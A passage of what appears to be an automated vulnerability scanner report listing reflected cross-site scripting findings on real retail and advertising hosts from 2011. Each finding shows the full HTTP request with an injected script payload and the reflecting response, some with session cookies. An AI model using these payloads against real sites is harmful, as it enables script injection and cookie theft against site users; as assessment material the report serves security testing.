Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:43 GMT
Connection: close

Unable to find /pacsun/newPromo_042811e5ba6<img src=a onerror=alert(1)>f5ab3ce03c0

5.33. http://images3.pacsun.com/is/image/pacsun/pop_email_011011b [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/pop_email_011011b

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d2c41<img%20src%3da%20onerror%3dalert(1)>5c8d452e9c8 was submitted in the REST URL parameter 4. This input was echoed as d2c41<img src=a onerror=alert(1)>5c8d452e9c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/pop_email_011011bd2c41<img%20src%3da%20onerror%3dalert(1)>5c8d452e9c8?$img_jpg$&$ext=.jpg HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:46 GMT
Connection: close

Unable to find /pacsun/pop_email_011011bd2c41<img src=a onerror=alert(1)>5c8d452e9c8

5.34. http://images3.pacsun.com/is/image/pacsun/redesign_social [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/redesign_social

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 25ab1<img%20src%3da%20onerror%3dalert(1)>aeaa39cfdec was submitted in the REST URL parameter 4. This input was echoed as 25ab1<img src=a onerror=alert(1)>aeaa39cfdec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/redesign_social25ab1<img%20src%3da%20onerror%3dalert(1)>aeaa39cfdec?$img_gif-alpha$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:01 GMT
Connection: close

Unable to find /pacsun/redesign_social25ab1<img src=a onerror=alert(1)>aeaa39cfdec

5.35. http://images3.pacsun.com/is/image/pacsun/spacer [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/spacer

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee327<img%20src%3da%20onerror%3dalert(1)>a0cf7621480 was submitted in the REST URL parameter 4. This input was echoed as ee327<img src=a onerror=alert(1)>a0cf7621480 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/spaceree327<img%20src%3da%20onerror%3dalert(1)>a0cf7621480?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 73
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:12 GMT
Connection: close

Unable to find /pacsun/spaceree327<img src=a onerror=alert(1)>a0cf7621480

5.36. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox12.offermatica.com
Path:   /m2/guitarcenter/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 15167<script>alert(1)</script>f4f6edc5c01 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPC=1305510019406-714170.17&mboxPage=1305510818677-601208&mboxCount=1&mbox=GC_hp_events15167<script>alert(1)</script>f4f6edc5c01&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 208
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Test & Target

mboxFactories.get('default').get('GC_hp_events15167<script>alert(1)</script>f4f6edc5c01',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305510019406-714170.17");

5.37. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 26383<x%20style%3dx%3aexpression(alert(1))>17d9ad9eed6 was submitted in the name parameter. This input was echoed as 26383<x style=x:expression(alert(1))>17d9ad9eed6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing26383<x%20style%3dx%3aexpression(alert(1))>17d9ad9eed6&sid=3167 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1305510200_11939:0_5512:44812; uid=1_1305510200_1305465388147:4406953890584386; kwd=1_1305510200; sit=1_1305510200_3166:0:0_3167:28:28_1888:44812:44812; cre=1_1305510200; bpd=1_1305510200; apd=1_1305510200; scg=1_1305510200; ppd=1_1305510200; afl=1_1305510200

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:51 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1305511011_11939:811_5512:45623; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: uid=1_1305511011_1305465388147:4406953890584386; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: kwd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: sit=1_1305511011_3166:811:811_3167:839:839_1888:45623:45623; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: cre=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: bpd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: apd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: scg=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: ppd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: afl=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 16 May 2011 01:56:51 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landing26383<x style=x:expression(alert(1))>17d9ad9eed6' *not* found -->

5.38. http://px.steelhousemedia.com/pr [get_px parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /pr

Issue detail

The value of the get_px request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb714'-alert(1)-'9f1b1c0493f was submitted in the get_px parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pr?get_px=1cb714'-alert(1)-'9f1b1c0493f&prov_id=9056 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachEvent("on" + etype, fn);
   },
   cload: function() {
       var st = document.createElement('script');
       var sturl = 'px.steelhousemedia.com/st?get_px=1cb714'-alert(1)-'9f1b1c0493f&aid=9056&cb=1305542500340658&ce=1';
       st.type = 'text/javascript';
       st.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + sturl;
       var list=document.getElementsByTagName('sc
...[SNIP]...

5.39. http://px.steelhousemedia.com/pr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /pr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb2d'-alert(1)-'136f0dfcab4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pr?get_px=1&prov_id=9056&9eb2d'-alert(1)-'136f0dfcab4=1 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachEvent("on" + etype, fn);
   },
   cload: function() {
       var st = document.createElement('script');
       var sturl = 'px.steelhousemedia.com/st?get_px=1&aid=9056&9eb2d'-alert(1)-'136f0dfcab4=1&cb=1305542505819756&ce=1';
       st.type = 'text/javascript';
       st.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + sturl;
       var list=document.getElementsByTagName('script');
...[SNIP]...

5.40. http://px.steelhousemedia.com/pr [prov_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://px.steelhousemedia.com
Path:   /pr

Issue detail

The value of the prov_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8130e'-alert(1)-'66a20514f58 was submitted in the prov_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pr?get_px=1&prov_id=90568130e'-alert(1)-'66a20514f58 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachEvent("on" + etype, fn);
   },
   cload: function() {
       var st = document.createElement('script');
       var sturl = 'px.steelhousemedia.com/st?get_px=1&aid=90568130e'-alert(1)-'66a20514f58&cb=1305542503023599&ce=1';
       st.type = 'text/javascript';
       st.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + sturl;
       var list=document.getElementsByTagName('script');

...[SNIP]...

5.41. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload f1893%0aalert(1)//ec5edae4c66 was submitted in the site parameter. This input was echoed as f1893
alert(1)//ec5edae4c66
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=1402662f1893%0aalert(1)//ec5edae4c66&d_id=bluefly-english HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 16 May 2011 02:03:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 458
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSDRRBRB=JICDIKHANBIPGCCIIAEHECCG; path=/
Cache-control: private

//Plugins for site 1402662f1893
alert(1)//ec5edae4c66

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2
...[SNIP]...

5.42. https://secure.bhphotovideo.com/bnh/controller/home [O parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The value of the O request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49fb3'><script>alert(1)</script>d3fa006fb10 was submitted in the O parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bnh/controller/home?O=cart.jsp49fb3'><script>alert(1)</script>d3fa006fb10&A=getpage&Q=Login.jsp HTTP/1.1
Host: secure.bhphotovideo.com
Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 10:18:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:18:26 GMT
Connection: keep-alive
Set-Cookie: TS20403f=6d633c8d60c83f78b51cf537b6a9e4775ba07e5bbdb6173b4dd0f9f2; Path=/
Content-Length: 30790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
<input type="hidden" name="prev_O" value='cart.jsp49fb3'><script>alert(1)</script>d3fa006fb10'/>
...[SNIP]...

5.43. https://secure.bhphotovideo.com/bnh/controller/home [f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The value of the f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd request parameter is copied into the HTML document as plain text between tags. The payload 91394<script>alert(1)</script>a321fbd6cb1 was submitted in the f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=191394<script>alert(1)</script>a321fbd6cb1 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 11:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 11:09:30 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=3T6hNRFdMX!-983539603; domain=bhphotovideo.com; path=/
Set-Cookie: cookieID=18171488471305544157963; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:23:25 GMT; path=/
Set-Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/
Content-Length: 30967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
</script>bb73022ddbd" value='191394<script>alert(1)</script>a321fbd6cb1'/>
...[SNIP]...

5.44. https://secure.bhphotovideo.com/bnh/controller/home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d64"><script>alert(1)</script>bb73022ddbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64"><script>alert(1)</script>bb73022ddbd=1 HTTP/1.1
Host: secure.bhphotovideo.com
Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 10:20:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:20:49 GMT
Connection: keep-alive
Set-Cookie: TS20403f=269e69a03030dd52b6fccf207c5322ed1be61ea6e18d367e4dd0fa81; Path=/
Content-Length: 30846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
<input type="hidden" name="prev_f6d64"><script>alert(1)</script>bb73022ddbd" value='1'/>
...[SNIP]...

5.45. http://sr2.liveperson.net/visitor/addons/deploy.asp [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 97932%0aalert(1)//3be4a2facd2 was submitted in the site parameter. This input was echoed as 97932
alert(1)//3be4a2facd2
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=5396538397932%0aalert(1)//3be4a2facd2&d_id=toshiba HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 459
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Mon, 16 May 2011 10:34:57 GMT
Connection: close

//Plugins for site 5396538397932
alert(1)//3be4a2facd2

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=
...[SNIP]...

5.46. http://sv.liveclicker.net/service/api [var parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sv.liveclicker.net
Path:   /service/api

Issue detail

The value of the var request parameter is copied into the HTML document as plain text between tags. The payload c9387<script>alert(1)</script>63737674e7e was submitted in the var parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service/api?method=liveclicker.widget.getList&account_id=311&&dim10=1&status=online&format=json&var=liveclicker.api_res[0]c9387<script>alert(1)</script>63737674e7e HTTP/1.1
Host: sv.liveclicker.net
Proxy-Connection: keep-alive
